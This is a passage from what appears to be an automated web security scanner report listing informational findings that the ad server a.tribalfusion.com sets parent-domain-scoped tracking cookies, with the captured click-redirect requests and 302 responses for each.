The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=afnFkjmge0wRusnZd7gvZcatR8ZbEScUCBDXs0j0s50GZb1NZbNHr3QTUauwUM8tQU0eWCZcJwiaT9KOt0ORNDIPwt3Fos42FUhgEgkcn6gbVL7kcYVbsSviZdk498UHG7ll0UOmZaZd03oZbIohusjqYPAOg3P9l1qIXMOOyVcIdYGSRPUWps27MXI47gapuaKm0ivgosOIrnO096QZaussCUB9yqu346N7wR4whrspZaQTuAry7D0DqkWQuEMZaR6D4ZbKvKLDWR1PA8TDijB6RZdtTUZdBnYh8ux1FrrnNPB903ZctJ4lfVtpBjNHNWBwjlOdluDCCKqFZb2brZaMZdROFQhavZcTSkZdyPSbHOIZdVYOMeiosYkFhpmMgM8aIQbfHbK3G8o6QwPyQT1FryGQ8ZcM48FyrtZd8GDZc4sCV1LqZaikES5Zb1ggkhTpxsfVYrnmvEUmhbc9Yds87sZdpP1MHN80q6G6Yp1qE3IS34IhXlTBwHfMShFhrRxjZdx7ycmCBq19hfEiJSscR3Uui17SS4Za0eKOOMWnVRHQdSddDa40Pp8UaZayWOpLbvqshOIEwbP2XJRmnLmXutTHs2ViVDZb32EHl; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:53 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

10.8. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=...[SNIP]...; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:37:44 GMT;
Content-Type: text/html
Location:
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

10.9. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:37:51 GMT;
Content-Type: text/html
Location: http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

10.10. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:20 GMT;
Content-Type: text/html
Location: http:/t.mookie1.com/t/v1/clk
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

10.11. http://a.tribalfusion.com/h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=agnhF4SkTAF8iiw8fQKkDVov5ZaVtL4kAJJHuly8Q36RZdu9P8pbfCuSisKOZcKDQXiFTKbrMRNxbBWMLZc4nZcoT0pGB6BrXuUjkmNittGpjkC1xZdD9VcwQUjOl7oyFNhBoOZacm4lY8LwxcYRyGe8NT5QuZaid1S5eljpmQOJ4bQX0HdqPu0oyM7tW6LZcSZdbxkrgktqi5TrhmfRAg5KVQr6jydWeHapkSCorEY5oPPOltPZcjFH4ZcUecfVxg0mrIVGjWcQCJ7k1UAnLdnYyYE2ZccSkhge3hadCbJBYbqd17D9VI4DOSZbD8UNhRfV45JZct312BhBZaITIPBpoQBn8der0fFh4FTS6gl035o36yY73spFfW0SiTyjx0noZbZaZcQIFvxbGBf6uePjMuPtZbrfOEZbdZdsTTdqE6OpUZdBVmMdgZavYrZdcZbZbsr6DVJnXvdXZcWKCpFK8RTvU5qFce0bTXsQwsfW0ktQrmyTbRXsgHZc7; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:23:45 GMT;
Content-Type: text/html
Location:
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

10.12. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aHnEGcolXPBpF5ICZbx9eCRAPU5GNZaF4esKR22lZaqg7mRb7CZdHxWKvM0xob5KTsmd3pZbZdKGx1XC5rL2mW9GXWvUHE9wZdxDkDW4Svj0H7X4Md5lVbgcpfmldHkYSFDS7VqmNxr2XZaWuendWENLdpZbLYObWxOZbRJfF7iQLWd5n43u5HhPLmEiEwvZburLVZakYh4ZcXFQLAgcIV1TtkpCw2oLw1SmxdfZd4AvD0yyZdTwh4T5NWhXMgyCgTgPiK3gheN7n4wofOZcJucGWT5oTAcZdG6c9AuuA2a8ghEO2d8AN0Gb4OABdCZbZaI7E95PtrxZcgD8pEHZbeeRw7QvJSZaBvuBNxsXNj2AN3M1tMGMZdGs71OXnZb4UMlQssGfEQBhhmRZcgGoSxbMZcf6ZdZc3jFvIGM8wVWfIVsvkQNpsgI1JZcUl8RJ5IUutjMfIN7RRJcjTGTwVwBurbbOYwW229i5YvxCZdqjACVhhAgKpEWlL6wv7ZaDaRtgSKLJZacsZcJSIG5MpSc29ynKmOb3ZcZcZdruPaS9p2DvnSnO8dplAA6J7jabf3nWcVK7eBX1Zd8vmh4QUNqQ65qyIQMMQCpAu; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:37:52 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

10.13. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:23:46 GMT;
Content-Type: text/html
Location:
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

10.14. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:23:48 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

10.15. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:23 GMT;
Content-Type: text/html
Location:
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

10.16. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
